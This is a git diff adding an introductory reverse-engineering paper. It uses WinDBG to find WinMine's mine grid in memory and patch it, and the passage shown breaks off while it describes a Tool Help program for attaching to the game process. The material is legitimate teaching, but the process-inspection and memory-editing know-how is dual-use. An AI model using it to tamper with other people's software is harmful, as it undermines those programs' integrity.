diff --git a/uninformed/1.1.txt b/uninformed/1.1.txt new file mode 100644 index 0000000..84b8327 --- /dev/null +++ b/uninformed/1.1.txt @@ -0,0 +1,1214 @@ +Introduction to Reverse Engineering Win32 Applications +trew +trew@exploit.us + + +1) Foreword + +Abstract: During the course of this paper the reader will be +(re)introduced to many concepts and tools essential to understanding and +controlling native Win32 applications through the eyes of Windows Debugger +(WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and +demonstrate the functionality provided by WinDBG and how this functionality +can be harnessed to aid the reader in reverse engineering native Win32 +applications. Topics covered include an introductory look at IA-32 assembly, +register significance, memory protection, stack usage, various WinDBG commands, +call stacks, endianness, and portions of the Windows API. Knowledge gleaned +will be used to develop an application designed to reveal and/or remove bombs +from the WinMine playing grid. + +Thanks: The author would like to thank thief, skape, +arachne, H D Moore, h1kari, Peter, warlord, west, and everyone else that +participated in the initial release of the Uninformed Journal. + + +2) Introduction + +Games can often times be very frustrating. This frustration stems +from the inherent fact that games, by design, present many unknowns +to the player. For example, how many monsters are lurking behind +door number three, and are these eight clips of 90 50 caliber +rounds going to be enough to kill this guy? Ten lives and a broken +keyboard later, acquiring the ability to not only level the playing +field, but get even, grows extremely attractive, at any cost. Some +people risk reputational and karma damage to acquire that edge -- by +cheating. + +Many develop cheats for this very reason, to obtain an unfair advantage. +Others, however, have an entirely different motivation -- the challenge it +involves. Motivations aside, the purpose of this document is to familiarize the +reader with basic methodologies and tools available that aid in the practice of +reverse engineering native Windows applications. Throughout, the reader will be +introduced to WinDBG, IA-32 assembler, and portions of the Windows API. These +concepts will be demonstrated by example, via a step by step navigation through +the portions of WinMine that are pivotal in obtaining the coveted unfair +advantage. + +3) Getting Started + +Although this document is designed to speak at an introductory level, it is +expected that the reader satisfies the following prerequisites: + + 1. Understanding of hexadecimal number system + 2. The ability to develop basic C applications + 3. The ability to install and properly configure WinDBG + 4. Access to a computer running Windows XP with WinMine installed + + +The following are suggested materials to have available while reading this document: + + + 1. IA-32 Instruction Set Reference A-M [7] + 2. IA-32 Instruction Set Reference N-Z [7] + 3. IA-32 Volume 1 - Basic Architecture [7] + 4. Microsoft Platform SDK [4] + 5. Debugger Quick Reference [8] + +First, WinDBG and the Symbol Packages http://msdl.microsoft.com/download/symbols/packages/windowsxp/WindowsXP-KB835935-SP2-slp-Symbols.exe +need to be properly installed and configured. WinDBG is part of The Debugging +Tools Windows http://msdl.microsoft.com/download/symbols/debuggers/dbg_x86_6.4.7.2.exe package. + +While these download, the time will be passed by identifing potential goals, +articulating what a debugger is, what abilities they provide, what symbols are, +and how they are useful when debugging applications. + + +3.1) Identifying Goals + +The basic strategy behind WinMine is to identify the location of bombs within a +given grid and clear all unmined blocks in the shortest duration of time. The +player may track identified bomb locations by placing flags or question marks +upon suspect blocks. With this in mind, one can derive the following possible +goals: + + 1. Control or modify time information + 2. Verify the accuracy of flag and question mark placement + 3. Identify the location of bombs + 4. Remove bombs from the playing grid + +In order to achieve these goals, the reader must first determine the following: + + 1. The location of the playing grid within the WinMine process + 2. How to interpret the playing grid + 3. The location of the clock within the WinMine process + +For the scope of this paper, the focus will be on locating, interpreting, and +revealing and/or removing bombs from the playing grid. + + +3.2) Symbols and Debuggers + +A debugger is a tool or set of tools that attach to a process in order to +control, modify, or examine portions of that process. More specifically, +a debugger provides the reader with the ability to modify execution flow, +read or write process memory, and alter register values. For these reasons, +a debugger is essential for understanding how an application works so that it +can be manipulated in the reader's favor. + +Typically, when an application is compiled for release, it does not contain +debugging information, which may include source information and the names of +functions and variables. In the absence of this information, understanding the +application while reverse engineering becomes more difficult. This is where +symbols come in, as they provide the debugger, amongst other things, the +previously unavailable names of functions and variables. For more information +on symbols, the reader is encouraged to read the related documents in the +reference section.[3] + + +3.3) Symbol Server + +Hopefully by now both the Debugging Tools for Windows and the Symbols Packages +have finished downloading. Install them in either order but take note of the +directory the symbols are installed to. Once both are installed, begin by +executing WinDBG, which can be found under Debugging Tools for Windows, beneath +Programs, within the Start Menu. Once WinDBG is running click on File, +Symbol File Path, and type in the following: + + SRV**http://msdl.microsoft.com/download/symbols + +For example, if symbols were installed to: + + C:\Windows\Symbols + +then the reader should enter: + + SRV*C:\WINDOWS\Symbols*http://msdl.microsoft.com/download/symbols + +This configuration tells WinDBG where to find the previously installed symbols, +and if needed symbols are unavailable, where to get them from -- the Symbol +Server. For more information on Symbol Server, the reader is encouraged to +read the information in the reference section.[2] + + +4) Getting Familiar with WinDBG + +Whether the reader points and clicks their way through applications or uses +shortcut keys, the WinDBG toolbar will briefly act as a guide for discussing +some basic debugging terminology that will be used throughout this document. +From left to right, the following options are available: + + 1. Open Source Code Open associated source code for the debugging session. + 2. Cut Move highlighted text to the clipboard + 3. Copy Copy highlighted text to the clipboard + 4. Go Execute the debugee + 5. Restart Restart the debugee process. This will cause the debugee to + terminate. + 6. Stop Debugging Terminate the debugging session. This will cause the + debugee to terminate. + 7. Break Pause the currently running debugee process + +The next four options are used after the debugger has been told to break. The +debugger can be issued a break via the previous option, or the user may specify +breakpoints. Breakpoints can be assigned to a variety of conditions. +Most common are when the processor executes instructions at a specific +address, or when certain areas of memory have been accessed. Implementing +breakpoints will be discussed in more detail later in this document. + +Once a breakpoint has been reached, the process of executing individual +instructions or function calls is referred to as stepping through the +process. WinDBG has a handful of methods for stepping, four of which will be +immediately discussed. + + 1. Step Into Execute a single instruction. When a + function is called, this will cause the debugger to step into + that function and break, instead of executing the function in its + entirety. + + 2. Step Over Execute one or many instructions. When a + function is called, this will cause the debugger to execute the + called function and break after it has returned. + + 3. Step Out Execute one or many instructions. Causes + the debugger to execute instructions until it has returned from the + current function. + + 4. Run to Cursor Execute one or many instructions. + Causes the debugger to execute instructions until it has reached + the addresses highlighted by the cursor. + +Next, is Modify Breakpoints which allows the reader to add or modify +breakpoints. The remainder of the toolbar options is used to make visible and +customize various windows within WinDBG. + + +4.1) WinDBG Windows + +WinDBG provides a variety of windows, which are listed beneath the View +toolbar option, that provide the reader with a variety of information. Of +these windows, we will be utilizing Registers, Disassembly, and Command. +The information contained within these three windows is fairly self describing. + +The Registers window contains a list of all processor registers and +their associated values. Note, as register values change during execution the +color of this value will turn red as a notification to the reader. For the +purpose of this document, we will briefly elaborate on only the following +registers: eip, ebp, esp, eax, ebx, ecx, edx, esi, and edi. + + eip: Contains the address of the next instruction to be executed + ebp: Contains the address of the current stack frame + esp: Contains the address of the top of the stack. This will be + discussed in greater detail further in the document. + +The remaining listed registers are for general use. How each of these +registers are utilized is dependant on the specific instruction. For specific +register usage on a per instruction basis, the reader is encouraged to +reference the IA-32 Command References [7]. + +The Disassembly window will contain the assembly instructions residing +at a given address, defaulting at the value stored within the eip +register. + +The Command window will contain the results of requests made of the +debugger. Note, at the bottom of the Command window is a text box. +This is where the user issues commands to the debugger. Additionally, to the +left of this box is another box. When this box is blank the debugger is either +detached from a process, processing a request, or the debugee is running. When +debugging a single local process in user-mode, this box will contain a prompt +that resembles "0:001>". For more information on interpreting this +prompt, the reader is encouraged to read the related documentation in the +reference section [9]. + +There exists three classes of commands that we can issue in the Command window; +regular, meta, and extension. Regular commands are those commands +designed to allow the reader to interface with the debugee. Meta commands +are those commands prefaced with a period (.) and are designed to configure or +query the debugger itself. Extension commands are those commands prefaced +with an exclamation point (!) and are designed to invoke WinDBG plug-ins. + + +5) Locating the WinMine Playing Grid + +Let's begin by firing up WinMine, via Start Menu -> Run -> WinMine. +Ensure WinMine has the following preferences set: + +Level: Custom + Height: 900 + Width: 800 + Mines: 300 +Marks: Enabled +Color: Enabled +Sound: Disabled + +Once this is complete, compile and execute the supplemental SetGrid +application[12] found in the reference section. This will ensure that the +reader's playing grid mirrors the grid utilized during the writing of this +paper. Switch over to WinDBG and press F6. This will provide the reader with a +list of processes. Select winmine.exe and press Enter. This will attach WinDBG +to the WinMine process. The reader will immediately notice the Command, +Registers, and Disassembly windows now contain values. + + +5.1) Loaded Modules + +If the reader directs attention to the Command window it is noticed that +a series of modules are loaded and the WinMine process has been issued a break. + +ModLoad: 01000000 01020000 C:\WINDOWS\System32\winmine.exe +ModLoad: 77f50000 77ff7000 C:\WINDOWS\System32\ntdll.dll +ModLoad: 77e60000 77f46000 C:\WINDOWS\system32\kernel32.dll +ModLoad: 77c10000 77c63000 C:\WINDOWS\system32\msvcrt.dll +... +ModLoad: 77c00000 77c07000 C:\WINDOWS\system32\VERSION.dll +ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.DLL +ModLoad: 771b0000 772d4000 C:\WINDOWS\system32\OLE32.DLL +(9b0.a2c): Break instruction exception - code 80000003 (first chance) +eax=7ffdf000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 +eip=77f75a58 esp=00cfffcc ebp=00cffff4 iopl=0 nv up ei pl zr na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 +ntdll!DbgBreakPoint: +77f75a58 cc int 3 + +The two 32-bit addresses following "ModLoad:" represent the virtual memory +address range the corresponding module is mapped to. These loaded modules +contain functionality that WinMine is dependant upon. To get a list of loaded +modules, the reader may issue either of the following commands: lm, !lm, !dlls + +The reader should also notice that WinDBG, by default, articulates register +values within the Command window upon reaching a breakpoint or at +the completion of each step. + +5.2) Loaded Symbols + + +Time was spent to download and install the Symbols Packages, so let's +see what hints they provide. Issue the following within the Command +window get a list of all available symbols for WinMine. + +x WinMine!* + +The e(x)amine command interprets everything to the left of the exclamation +point as a regular expression mask for the module name, and everything to the +right as a regular expression mask for the symbol name. For more information +on regular expression syntax, the reader is encouraged to read the related +documents in the reference section [10]. + +A list of symbols will scroll within the Command window. + +... +01003df6 winmine!GetDlgInt = +010026a7 winmine!DrawGrid = +0100263c winmine!CleanUp = +01005b30 winmine!hInst = +01003940 winmine!Rnd = +01001b81 winmine!DoEnterName = +... + +From this listing, it is not possible to positively ascertain which symbols +represent functions or variables. This is due, as WinDBG has pointed out, to +the absence of type information. This is typical of public symbol files. +Thankfully, methodologies exist that allow the reader to, at a minimum, +distinguish functions from non-functions. Assuming the reader is not well +versed reading assemblies, methods requiring that skill set will be for a short +time avoided. An alternative technique, examining virtual memory protections, +will be investigated that is relatively easy to comprehend and apply, + + +5.3) Memory Protection + +Thus far, discussions related to application memory have been sufficiently +neglected, until now. This is not to say the interworkings of Windows memory +management are about to be revealed, vice, a fairly pigeon holed approach will +be taken for the sake of brevity and to satisfy our immediate utilitarian +needs. + +When an application requests memory, a region is allocated provided the +requested amount is available. If the allocation is successful, this region of +memory can, amongst other things, be protected. More specifically, the region +has psuedo access control lists applied to it that deny or permit certain access +types. A couple examples of these access types are the ability to read +information from, write information to, and execute instructions at, the given +region. It is these access types that will provide the ability to quickly +determine with relatively high probability whether a symbol is a function or +non-function. By virtue of being a function, these memory regions allow +execution. Conversely, memory regions allocated for classic variables do not +allow instruction execution. All memory pages on the IA-32 architecture are +executable at the hardware level despite memory protections.. Conveniently, +WinDBG is shipped with an extension that allows the user the retrieve memory +protection attributes for a given address. This extension command is !vprot. +Let's select aptly named symbols to demonstrate this functionality. Type the +following in the Command window: + +!vprot WinMine!ShowBombs + + +ShowBombs was chosen as the name implies (to me) that it's a function. +Let's see what !vprot says: + +BaseAddress: 01002000 +AllocationBase: 01000000 +AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY +RegionSize: 00003000 +State: 00001000 MEM_COMMIT +Protect: 00000020 PAGE_EXECUTE_READ +Type: 01000000 MEM_IMAGE + +At first glance this might appear contradictory. However, the +AllocationProtect field denotes the default protection for the entire +memory region. The Protect field speaks to the current protections on +the specific region specified in the first argument. This, as one would +expect, is set to execute and read as denoted by PAGE_EXECUTE_READ. +Next, look at the memory protection for a region allocated for a suspected +variable, such as WinMine!szClass. + +!vprot WinMine!szClass + +The expectation is !vprot will return page protection that only allows +read and write access to this region. + +BaseAddress: 01005000 +AllocationBase: 01000000 +AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY +RegionSize: 00001000 +State: 00001000 MEM_COMMIT +Protect: 00000004 PAGE_READWRITE +Type: 01000000 MEM_IMAGE + +So be it. Considering the naming convention (sz preface), which implies a +string type, one could easily validate the assumption by examining the data +at this memory location. To do this, the display memory command can be +utilized. Type the following in the Command window: + +du WinMine!szClass + +The 'u' modifier tells the (d)isplay memory command to interpret the string as +Unicode. The results of this are: + +01005aa0 "Minesweeper" + +I'm convinced. + + +5.4) Understanding Assemblies + +The goal for this chapter is to simply locate where the playing grid resides. +With that in mind, revisit the previously identified ShowBombs function. +Logically, it wouldn't be that long of a jump to assume this function will lead +to the playing grid. Set a breakpoint on this function by issuing the +following command: + +bp WinMine!ShowBombs + +WinDBG provides no positive feedback that the breakpoint was successfully set. +However, WinDBG will alert the user if it is unable to resolve the name or +address being requested. To obtain a list of set breakpoints, issue the +following command: + +bl + +The Command window should reflect: + +0 e 01002f80 0001 (0001) 0:*** WinMine!ShowBombs + +The leading digit represents the breakpoint number, which can be used as a +reference for other breakpoint aware commands. The next field depicts the +status of the breakpoint, as either (e)nabled or (d)isabled. This is followed +by the virtual address of the breakpoint. The next four digits speak to the +number of passes remaining until this breakpoint will activate. Adjacent, +in parentheses, is the initial pass count. Next, is the process number, not to +be confused with process ID, a colon acting as a separator between what would +be a thread ID, if this was a thread specific breakpoint. It's not, hence +three asterisks. Lastly, at least in the above example, is the module name +and symbol/function where WinDBG will break at. + +Set WinMine in motion by hitting F5 (Go) or type 'g' in the Command +window. The reader should notice that WinDBG informs the user the +"Debugee is running". Switch to the WinMine window and click on the +upper left box, which should reveal the number two. Next, click the box to the +right and it will be very apparent that a bomb has been selected, as the reader +will no longer be able to interact with WinMine. This is due to the fact that +WinDBG recognized that a breakpoint condition has been met and is waiting for +instruction. When back in the WinDBG, the Command window has +highlighted the following instruction: + +01002f80 a138530001 mov eax,[WinMine!yBoxMac (01005338)] + +This is the first instruction within the ShowBombs function, which +corresponds to the address previously identified when current breakpoints were +listed. Before attempting to understand this instruction, let's first cover a +few functional and syntactical aspects of IA-32 assembly. It is recommended +that the reader make available the aforementioned supplemental material +mentioned in Chapter 2. + +Each line in the disassembly describes an instruction. Use the above +instruction to identify the major components of an instruction without getting +distracted by how this instruction relates to the ShowBombs function. +If distilled, the previous instruction can be abstracted and represented as: + +
, + +The
represents the virtual location of the . +Opcodes are literal instructions that the processor interprets to perform work. +Everything to the right of represents a translation of these +opcodes into assembly language. The can be thought of as a +verb or function that treats each operand as an argument. It's of importance +to note that in Intel Opposed to ATT style, which is utilized by GCC style assembly, these operations move from right to left. +That is, when performing arithmetic or moving data around, the result typically +finds its destination at . + +Looking back at the original instruction one can determine that the 32-bit +value, or word, located at 0x01005338 is being copied into the eax +register. Brackets ([]) are used to deference the address contained in an +operand, much like an asterisk (*) does in C. Let's focus on the opcodes for +a moment. If the reader looks up the opcode for a mov +instruction into the eax register, the value 0xa1 will be found. + +Opcode Instruction Description +... +A0 MOV AL,moffs8* Move byte at (seg:offset) to AL. +A1 MOV AX,moffs16* Move word at (seg:offset) to AX. +A1 MOV EAX,moffs32* Move doubleword at (seg:offset) to EAX. +... + +It is not by coincidence that the first byte of is also 0xa1. +This leaves for the remainder, which brings us to the short +discussion in endianness. + + +5.5) Endianness + +Endianness refers to the order by which any multi-byte data is stored. There +exists two commonly referred conventions: little and big. Little endian +systems, which includes the IA-32 architecture, store data starting with the +least significant byte, through the most significant byte. Big endian systems +do the opposite, storing the most significant byte first. For example, the +value 0x11223344 would be stored as 0x44332211 on a little endian system, +and 0x11223344 on a big endian system. + +Notice the value in is 0x01005338 and the remainder of + is 0x38530001. If is rewritten and +expressed in little endian order one can see these values are equal. + +0x01005338, rewritten for clarity: 0x01 0x00 0x53 0x38 + | | | | + | | +----|-+ + | +--------|-|-+ + +--------------|-|-|-+ + V V V V + 0x38530001 + +With this information, one can see exactly how the processor is instructed to +move the value stored at 0x01005338 into the eax register. For more +information on endianness, the reader is encouraged to read the related +documents in the reference section [5]. + + +5.6) Conditions + +Let's see if this new information can be applied to aid in reaching the goal of +locating the playing grid. Start by hitting F10, or by typing 'p' in the +Command window, to execute the current instruction and break. There +are a couple of things to notice. First, the previously magenta colored bar +that highlighted the examined instruction from above is now red and the +instruction just below this is now highlighted blue. WinDBG, by default, +denotes instructions that satisfy a breakpoint condition with a red highlight +and the current instruction with a blue highlight. Additionally, a handful of +values in the Registers window have been highlighted in red. Remember +from Chapter 4 that this signifies an updated register value. As one would +expect, the eax register has been updated, but what does its new value +represent? 0x18, which now resides in eax, can be expressed as 24 in +decimal. Note that our playing grid, even though previously specified at +800x900, was rendered at 30x24. Coincidence? This can be validated by +restarting WinMine with varying grid sizes, but for the sake of brevity let the +following statement evaluate as true: + +winmine!yBoxMac == Height of Playing Grid + +The following instructions: + +01002f85 83f801 cmp eax,0x1 +01002f88 7c4 jl winmine!ShowBombs+0x58 (01002fd8) + +compare this value, the maximum height, to the literal numeric 0x1. If the +reader visits the description of the cmp instruction in the reference +material it can be determined that this command sets bits within +EFLAGS[6] based on the result of the comparison. +Logically, the next instruction is a conditional jump. More specifically, this +instruction will jump to the address 0x01002fd8 if eax is +"Less, Neither greater nor equal" than 0x1. One can come to this conclusion by +first recognizing that any mnemonic starting with the letter 'j' and is not +jmp is a conditional jump. The condition by which to perform the jump +is represented by the following letter or letters. In this case an 'l', which +signifies "Jump short if less" per the definition of this instruction found in +the instruction reference and the previously mentioned EFLAGS +definition. This series of instructions can be expressed in more common terms +of: + +if(iGridHeight < 1) { + //jmp winmine!ShowBombs+0x58 +} + +Translating assembly into pseudo code or C may be helpful when attempting to +understand large or complex functions. One can make the prediction that the +conditional jump will fail, as eax is currently valued at 0x18. But, +for the mere academics of it, one can determine what would happen by typing +the following in the Command window: + +u 0x1002fd8 + +This will show the reader the instructions that would be executed should the +condition be met. + + +5.7) Stacks and Frames + +The 'u' command instructs WinDBG to (u)nassemble, or translate from opcodes to +mnemonics with operands, the information found at the specified address. + +01002fd8 e851f7ffff call WinMine!DisplayGrid (0100272e) +01002fdd c20400 ret 0x4 + +From this, one can see that the DisplayGrid function is called and the +ShowBombs function subsequently returns to the caller. But what is +call actually doing? Can one tell where ret is really +returning to and what does the 0x4 represent? The IA-32 Command Reference +states that call "Saves procedure linking information on the stack and +branches to the procedure (called procedure) specified with the destination +(target) operand. The target operand specifies the address of the first +instruction in the called procedure." The reader may notice that the command +reference has variable behaviors for the call instruction depending on +the type of call being made. To further identify what call is doing, +the reader can examine the opcodes, as previously discussed, and find 0xe8. +0xe8, represents a near call. "When executing a near call, the processor +pushes the value of the EIP register (which contains the offset of the +instruction following the CALL instruction) onto the stack (for use later as a +return-instruction pointer)." This is the first step in building a frame. +Each time a function call is made, another frame is created so that the called +function can access arguments, create local variables, and provide a mechanism +to return to calling function. The composition of the frame is dependant on +the function calling convention. For more information on calling conventions, +the reader is encouraged to read the relevant documents in the reference +section[1]. To view the current call stack, or series of +linked frames, use the 'k' command. + +ChildEBP RetAddr +0006fd34 010034b0 winmine!ShowBombs +0006fd40 010035b0 winmine!GameOver+0x34 +0006fd58 010038b6 winmine!StepSquare+0x9e +0006fd84 77d43b1f winmine!DoButton1Up+0xd5 +0006fdb8 77d43a50 USER32!UserCallWinProcCheckWow+0x150 +0006fde4 77d43b1f USER32!InternalCallWinProc+0x1b +0006fe4c 77d43d79 USER32!UserCallWinProcCheckWow+0x150 +0006feac 77d43ddf USER32!DispatchMessageWorker+0x306 +0006feb8 010023a4 USER32!DispatchMessageW+0xb +0006ff1c 01003f95 winmine!WinMain+0x1b4 +0006ffc0 77e814c7 winmine!WinMainCRTStartup+0x174 +0006fff0 00000000 kernel32!BaseProcessStart+0x23 + +With this, the reader can track the application flow in reverse order. The +reader may find it easier to navigate the call stack by pressing Alt-6, which +will bring up the Call Stack window. Here, the call stack information +is digested a bit more and displayed in a tabular manner. With the call stack +information, one can answer the second question regarding where ret is +really headed. For example, once ShowBombs returns, eip will +be set to 0x010034b0. Finally, the significance of 0x4 can be learned by +reading the ret instruction definition, which states that this value +represents "...the number of stack bytes to be released after the return +address is popped; the default is none. This operand can be used to release +parameters from the stack that were passed to the called procedure and are no +longer needed." More specifically, when the processor encounters a ret +instruction it pops the address stored at the top of the stack, where esp +is pointing, and places that value in the eip register. If the ret +instruction has an operand, that operand represents how many additional bytes +should be removed from the top of the stack. With this information, and +knowing that 32-bit addresses are four bytes long, one can determine that the +ShowBombs function accepts one argument. This is dependant upon calling +convetion, which will be discussed later in this document. + +Returning to the task at hand, the following represents the current picture of +what the ShowBombs function is doing: + +if(iGridHeight < 1) { + DisplayGrid(); + return; +} else { + //do stuff +} + +Continuing on, one can see the following in the Disassembly window, which +will take the place of "//do stuff". + +01002f8a 53 push ebx +01002f8b 56 push esi +01002f8c 8b3534530001 mov esi,[winmine!xBoxMac (01005334)] +01002f92 57 push edi +01002f93 bf60530001 mov edi,0x1005360 + +Begin by stepping WinDBG twice (by pressing 'p' twice) so that eip is set +to 0x1002f8a. The next two instructions are storing the ebx and esi +registers on the stack. This can be demonstrated by first viewing the memory +referenced by esp, identifying the value stored in ebx, pressing 'p' +to execute push ebx, and revisiting the value stored at esp. The +reader will find the value of ebx stored at esp. + +0:000> dd esp +0006fd38 010034b0 0000000a 00000002 010035b0 +0006fd48 00000000 00000000 00000200 0006fdb8 +... +0:000> r ebx +ebx=00000001 +0:000> p +eax=00000018 ebx=00000001 ecx=0006fd14 edx=7ffe0304 esi=00000000 edi=00000000 +eip=01002f8b esp=0006fd34 ebp=0006fdb8 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 +winmine!ShowBombs+0xb: +01002f8b 56 push esi +0:000> dd esp +0006fd34 00000001 010034b0 0000000a 00000002 +0006fd44 010035b0 00000000 00000000 00000200 + +Notice, that esp has been decremented by four (the size of a 32-bit pointer) +and the value of ebx is at that location. The behavior can be observed again +by stepping to execute push esi. Again, the reader will notice the value of +esp decrement by four and the value within esi is at this new +location. This is the basic principal of how the stack works. The stack +pointer is decremented and the value being push'd onto the stack is placed at +the new address esp is pointing at. It is also important to note that +the stack grows down. That is, as values are placed on the stack, the stack +pointer decreases to make room. Which begs the question, what are the upper +and lower limits of the stack? It can't keep on growing for ever, can it? The +short answer is no, the stack has a floor and ceiling. Which can be identified +by examining the Thread Environment Block or TEB. Luckily, WinDBG comes +with an extension command to accomplish this, !teb. + +0:000> !teb +TEB at 7ffde000 + ExceptionList: 0006fe3c + StackBase: 00070000 + StackLimit: 0006c000 + SubSystemTib: 00000000 + FiberData: 00001e00 + ArbitraryUserPointer: 00000000 + Self: 7ffde000 + EnvironmentPointer: 00000000 + ClientId: 00000ff4 . 00000ff8 + RpcHandle: 00000000 + Tls Storage: 00000000 + PEB Address: 7ffdf000 + LastErrorValue: 183 + LastStatusValue: c0000008 + Count Owned Locks: 0 + HardErrorMode: 0 + +Note the values for StackBase and StackLimit, which refer to the +stack's ceiling and floor, respectively. For more information on the TEB, the +reader is encouraged to read the related documents in the reference +section [11]. That was an exciting tangent. Circling back, the reader is +found at the following instruction: + +01002f8c 8b3534530001 mov esi,[winmine!xBoxMac (01005334)] + +This, if convention holds true, will store the width of the playing grid in +esi. By single stepping ('p'), the reader will notice the esi +register is denoted in red within the Registers window and now contains +the value 0x1e. 0x1e is 30 in decimal, which, if the reader recalls, is the +width of the current playing grid. Hence, one can make the educated +determination that xBoxMac represents the width of the playing grid. +The next instruction, push edi, is saving the value in the edi +register on the stack in preparation for the subsequent instruction; +mov edi,0x1005360. This is were things get a bit more interesting, as +this instruction begs the question; what is the significance of 0x1005360? +Considering the previous instructions gathered prerequisite information about +the playing grid, perhaps this address is indeed the playing grid itself! To +determine this, the reader should examine some aspects of this memory address. +The aforementioned !vprot extension command will provide information +regarding the type of access permitted to this memory address, which is +PAGEREADWRITE. This information isn't overly valuable but is +favorable in the sense that this address does not reside within an executable +portion of the application space and is therefore likely a variable allocation. +If this area is truly the playing grid one should be able to identify a pattern +while viewing the memory. To accomplish this, type 0x1005360 in to the Memory +window. The following should appear: + +01005360 10 42 cc 8f 8f 8f 8f 0f 8f 8f 8f 8f 0f 0f 8f 0f .B.............. +01005370 0f 8f 8f 8f 8f 8f 8f 0f 0f 0f 8f 0f 0f 8f 8f 10 ................ +01005380 10 8f 0f 0f 8f 8f 0f 0f 0f 0f 0f 8f 0f 0f 8f 8f ................ +01005390 0f 8f 0f 0f 0f 8f 8f 8f 0f 0f 8f 8f 8f 8f 8f 10 ................ +010053a0 10 0f 0f 8f 0f 0f 8f 0f 0f 0f 0f 0f 8f 0f 0f 0f ................ +010053b0 8f 0f 0f 0f 8f 8f 0f 0f 8f 0f 8f 0f 8f 8f 0f 10 ................ +010053c0 10 0f 0f 8f 0f 0f 8f 0f 0f 0f 8f 0f 0f 8f 0f 0f ................ +010053d0 8f 0f 0f 8f 0f 0f 0f 8f 0f 0f 0f 8f 0f 0f 0f 10 ................ +010053e0 10 0f 0f 8f 0f 8f 8f 0f 0f 8f 8f 0f 0f 8f 0f 0f ................ +010053f0 0f 0f 0f 0f 8f 0f 0f 0f 0f 0f 0f 0f 8f 0f 0f 10 ................ +01005400 10 8f 0f 0f 0f 0f 0f 0f 8f 8f 0f 8f 8f 0f 0f 8f ................ +01005410 0f 8f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 8f 8f 0f 10 ................ +01005420 10 8f 0f 8f 8f 0f 8f 8f 0f 0f 0f 8f 8f 0f 8f 0f ................ + +6) Interpreting the Playing Grid + +The reader may make the immediate observation that this portion of memory is +littered with a limited set of values. Most notably are 0x8f, 0x0f, 0x10, +0x42, 0xcc. Additionally, one may notice the following repeating pattern: + +0x10 <30 bytes> 0x10. + +The number 30 may ring familiar to the reader, as it was encountered earlier +when discovering the grid width. One may speculate that each pattern +repetition represents a row of the playing grid. To aid in confirming this, +switch to WinDBG and resume WinMine by pressing 'g' in the Command +window. Switch to WinMine and mentally overlay the information in the +Memory window with the playing grid. A correlation between these can +be identified such that each bomb on the playing grid corresponds to 0x8f and +each blank position on the playing grid corresponds to 0x0f. Furthermore, one +may notice the blown bomb on the playing grid is represented by 0xcc and the +number two is represented by 0x42. + +To confirm this is indeed the playing grid, it is essential to test the lower +bound by performing simple arithmetic and exercising the same technique +employed to identify the suspected beginning. The current hypothesis is +that each aforementioned pattern represents a row on the playing grid. If +this is true, one can multiply 32, the length of our pattern, by the number +of rows in the playing grid, 24. The product of this computation is 768, or +0x300 in hexadecimal. This value can be added to the suspected beginning of +the grid, which is located at 0x01005360, to derive an ending address of +0x01005660. Restart WinMine by clicking the yellow smiley face, rerun the +SetGrid helper application, and click the bottom right square on +the playing grid. Coincidentally, the number two will appear. Next, click +on the position to the immediate left of the number two. This position +contains a bomb and will trigger a breakpoint in WinDBG. Switch over to +WinDBG and direct attention to the Memory window. Press 'Next' +in the Memory window twice to bring this range into focus. + +01005640 10 8f 0f 0f 0f 8f 0f 0f 8f 0f 8f 0f 0f 0f 0f 8f ................ +01005650 0f 8f 0f 0f 0f 8f 0f 0f 0f 0f 0f 0f 0f cc 42 10 ..............B. +01005660 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................ +01005670 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................ + +Following the same overlay as before, the reader will notice that the previous +correlations can be made between the last row of the playing grid and the information +located at 0x01006540, the start of the previously identified 32 byte pattern. +Notice, again, each bomb is represented by 0x8f. With this information the +reader can reasonably conclude that this is indeed the playing grid. + + +7) Removing Mines + +Before venturing into a programmatic method of instrumenting the playing grid +the reader will first be introduced to tools provided by WinDBG, more +specifically, the (e)nter values command. This command allows the reader to +manipulate specific portions of virtual memory and can be utilized to, amongst +other things, remove bombs from the WinMine playing grid. First, reset the +grid by resuming the WinMine process in WinDBG, clicking on the yellow smiley +face in WinMine, and running the SetGrid application. Next, click on +the top left position to expose the two and break the WinMine process within +WinDBG by pressing Control+Break. The reader should recall that the address +0x01005362, to the immediate right of the two, contains a bomb. To demonstrate +the enter values command perform the following in the Command window. + +eb 0x01005362 0x0f + +Resume WinMine in WinDBG and click on the position to the right of the two. +Notice, instead of a bomb being displayed, the number two is revealed. The +reader could perform the tedious task of performing this function manually +throughout the grid, or, one could develop an application to reveal and/or +remove the bombs. + + +7.1) Virtual Mine Sweeper + +In this section, the reader will be introduced to portions of the Windows API +that will allow one to develop an application that will perform the following: + + 1. Locate and attach to the WinMine process + 2. Read the WinMine playing grid + 3. Manipulate the grid to either reveal or remove hidden bombs + 4. Write the newly modified grid back into WinMine application space + +To accomplish the first task, one can enlist the services of the +Tool Help Library, which is exposed via Tlhelp32.h. A snapshot +of running processes can be obtained by calling CreateToolhelp32Snapshot, +which has the following prototype This information can be obtained by referencing the Platform SDK: + +HANDLE WINAPI CreateToolhelp32Snapshot( + DWORD dwFlags, + DWORD th32ProcessID +); + +This function, when called with dwFlags set to TH32CSSNAPPROCESS +will provide the reader with a handle to the current process list. To +enumerate this list, the reader must first invoke the Process32First +function, which has the following prototype: + +BOOL WINAPI Process32First( + HANDLE hSnapshot, + LPPROCESSENTRY32 lppe +); + +Subsequent iterations through the process list are accessible via the +Process32Next function, which has the following prototype: + +BOOL WINAPI Process32Next( + HANDLE hSnapshot, + LPPROCESSENTRY32 lppe +); + +As the reader surely noticed, both of these functions return a LPPROCESSENTRY32, +which includes a variety of helpful information: + +typedef struct tagPROCESSENTRY32 { + DWORD dwSize; + DWORD cntUsage; + DWORD th32ProcessID; + ULONG_PTR th32DefaultHeapID; + DWORD th32ModuleID; + DWORD cntThreads; + DWORD th32ParentProcessID; + LONG pcPriClassBase; + DWORD dwFlags; + TCHAR szExeFile[MAX_PATH]; +} PROCESSENTRY32, 